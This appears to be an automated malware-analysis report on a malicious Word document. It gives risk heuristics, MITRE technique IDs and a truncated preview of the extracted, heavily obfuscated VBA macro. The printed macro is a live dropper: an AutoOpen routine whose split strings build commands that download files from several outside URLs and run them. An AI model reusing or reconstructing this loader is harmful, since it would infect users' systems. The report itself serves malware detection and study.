MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes a Shell() call, indicating an attempt to execute an external command, likely to download and run a second-stage payload. The ClamAV detection also points to a phishing lure.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 75765 bytes |
SHA-256 (macros.bas): 2f66bde274801eeb6f7cf18ae30f3d58fceb16c7847e20c7f2eb1f45ee5abf91
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wVnBiCK"
Function BXzwolhbmMOjji()
On Error Resume Next
uMkuGdENCwb = GjqrMSTfTVBFfj - CBool(YopQRwRlI) * 216045258 / Sqr(VJKKAJXF) + wISqNXLtA / Atn(9898) * tMaGhSQN - CDate(376) - Kvowhjr / 3 + IUTMiAOk / FwbtGFRZ
QKADYiziRO = cYZifWFdvu - CBool(DOIJFsP) * 216045258 / Sqr(FzcNXcSdYRqCu) + oSfjZivnrn / Atn(9898) * hXPGwXkS - CDate(376) - dbzLBFM / 3 + hLEsJiaqiYThuS / pBqFCWb
NhtbutdpChF = MuDGHNR + Mid("jdaFAI8dNGdHAz7lMQHPCjVGv:sgu+sgupsgu+sguusgu+sgublic +sgu+sgu cjVG+jVGRCTf6cRC + 1jVG+jVG3isgu+sguksgu+jVG+jVG'+'sguasgu+sgurapas '+'+ sgu+sgucRCsgu+sgu.ej'TcBCW", 22, 136) + UiGkbiPFcditj
zfsRb = wvDcsjwRv - CBool(JKlKWOCYjz) * 216045258 / Sqr(MLVXNSmMD) + XYRhwFjcjPMFt / Atn(9898) * AUoEiEjkaAm - CDate(376) - iFiRJFrfmlTc / 3 + IVvzjCHSuWs / hhzJnwRuNWa
GNjdHciGEji = hokvNDo - CBool(ofEoXuvoa) * 216045258 / Sqr(VkYcjvvkr) + aPldSKaPmAj / Atn(9898) * HBXVbudISCofz - CDate(376) - jEEoAcLJ / 3 + ZubWMUfBamjdX / OUAGjLX
JijqcafKzU = hNmvzjd - CBool(tEEHqSCLRYAGTP) * 216045258 / Sqr(irLddjWrqbAdRj) + nGOClLjcvVZMa / Atn(9898) * zjhSQDDmCzLWMO - CDate(376) - qolbikusQdk / 3 + PPHEXwtsvSLBjj / DOqOwVw
pFAYjRVizL = RGHNNpPBLiVilm + Mid("LjVGgu+sg'+'uasgu+sgudsgu+sguasd.nsjVG+jVGgu+sgu'+'esgu+sguxt(sgu+sgu1sgu'+'+sgu, 343245sgu+sgu);13isgu+sguhsgu+sguuas sgu+sgu= 13ien'+'sgu+sgujVG+NWu9YNXul", 2, 146) + zfQojmncXrVwn
Lzdisljzim = GiGiWLwzEiz - CBool(wbAYRonB) * 216045258 / Sqr(tSjIzpUAW) + wTwnwQhzUDa / Atn(9898) * CfMGnTcpvYWM - CDate(376) - LWVWVdzh / 3 + wqAnDIk / SznLQDwtCAXhh
wXRVoddtiDt = mGOFbaoEHoD - CBool(QtXzZwiuiB) * 216045258 / Sqr(EGZdEUvBAQLBKZ) + lkwJqHJQiC / Atn(9898) * lzCGRukMJ - CDate(376) - CzjjMnDFEsMYEM / 3 + wZLmuqqapjvzt / RQwPWjmMZdUGKd
jwQIqIJ = FYYAuTZ - CBool(TcbAUYtOLSO) * 216045258 / Sqr(PTXMLQWanB) + DbcUZMaqalzf / Atn(9898) * zzfIcrowFjplAM - CDate(376) - iwzqRsXYrDUCl / 3 + onRnaNLkOww / mwvniZAkL
AkfUBLdXHX = zlbltLbzZaA + Mid("0RI6qijVLUEOmCIH1ijMmBD460jz+sgu://jVG+jVGm'+'elb.org/sgu+sgu1sgu+sguoz3i/,sgu+sgu'+'http:/sYizoHSdjWWj", 29, 64) + jVFAQUF
GqlVfVVkd = DMvpNTVY - CBool(PILWuzQnJH) * 216045258 / Sqr(bOIhdGlziSofN) + lXAKjfwrY / Atn(9898) * NXQSaMj - CDate(376) - CqipENLGhVqHac / 3 + FIcQddbrjpHTGq / ZVmscXiwS
KFOrHtr = pbwtOTrjBOV - CBool(cTPILouap) * 216045258 / Sqr(VrDsHWjVji) + itkjtffsShaw / Atn(9898) * UtkPAAvUqSFH - CDate(376) - WLVzfhmkwZfYS / 3 + PiXqvtUX / mTVjnNnbi
PEzHNkNOML = AbXLKdiEiQiY - CBool(jhjJbZjZBXjz) * 216045258 / Sqr(ttJiifwrkz) + wnTYOwiPbOKY / Atn(9898) * FUvlJwDnOokk - CDate(376) - vmDbqwjtKoGKKE / 3 + UWHiVZcJjLimu / kzioTBwMzYMoqu
MMzwhZtRC = zZzaARZkZKJz + Mid("j7FWQ2PXd5D7wK81jvCm'+'guFilsgu+sguesgu+sgu(1sgu+sgu3isgu'+'+sguabc.Tosgu+sguStrisgu+sgung(), 1sgu+sgu3isgu+sguhuas)sgu+sgu;Invosgu+sguksjVG+jVGgu+sgue-jVG+jVGIssEMsbWC7i", 21, 141) + DSbzwzwtFQOwVU
uJNqHMHDGo = CJTWUBsLwWT - CBool(qhqflTc) * 216045258 / Sqr(OVwzjiKA) + WKwAwQzwMCoDhW / Atn(9898) * vhcopHc - CDate(376) - wVOhKWnqqr / 3 + bLVDuRrj / QnGjzwBBBW
zOwkYDv = SNYDIJAZlW - CBool(IFUMpTIDQnVTzW) * 216045258 / Sqr(FwAvOLmK) + pocEGHQA / Atn(9898) * TqFuqzT - CDate(376) - tKjzuajz / 3 + CZpImVv / XArEwJXU
plJXzKB = YDDKOihOUloUjU - CBool(VWYMiCIAEpuJ) * 216045258 / Sqr(GcXTzMS) + moQzAaFnYdiCO / Atn(9898) * DFVnwPCzVT - CDate(376) - dHsOUUUBoi / 3 + HNhbDNfMQHpm / RwLPDonTwb
ZQwjtTABh = ruqzfhio + Mid("SiLAXzandsgu+sguomsgu+sgu;'+'sgu+sgu1sgu+sgu3ibcsgu+sgud = cRCsgu+sguhsgu+sg'+'uttp://ssgu+sgursg'+'u+sguatim.zesesgu+sgux'+'.sgu+sguc'+'o.il/4jVG+jVGEsgu+sgux'+'1Ysgu+sgu/s'+'gu+sgu,htjwjOKtJOc9", 7, 179) + YMzLWvpZiiW
KPzEmzz = ijDKHAbDS - CBool(bLvNvECEqKu) * 216045258 / Sqr(UKiTwcGwBLcd) + zwtuYOEUuTAcmv / Atn(9898) * uFhJWzM - CDate(376) - boCzzVaQiRRvI / 3 + JRwpMZqi / LhGBwdTHznDSG
skbECLqi = MoZMttSzkli - CBool(FvhoRtSmOvBlVi) * 216045258 / Sqr(GOoOXDkYcKDc) + MnF
... (truncated)